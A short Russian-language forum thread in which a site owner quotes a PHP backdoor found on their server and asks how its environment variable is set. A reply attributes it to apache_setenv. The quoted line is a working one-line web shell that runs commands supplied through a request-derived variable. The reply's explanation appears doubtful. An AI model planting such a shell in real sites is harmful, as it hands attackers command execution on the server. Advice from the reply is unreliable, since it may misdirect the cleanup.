Я нашел бэкдор php на своем хосте.
<? passthru(getenv(HTTP_ACCEPT_TROLOLO)); ?>
Я вижу в журнале доступа к этому php-файлу запросы POST, но я не знаю, как был установлен SETENV этой переменной; может кто-нибудь объяснить, как можно установить такую переменную и, если возможно, где я могу ограничить / отключить установку таких переменных на стороне сервера.
Спасибо
-ЧАС.
это было установлено apache_setenv();
Ищи
apache_setenv("HTTP_ACCEPT_TROL
или
apache_setenv('HTTP_ACCEPT_TROL
и ты найдешь свой ответ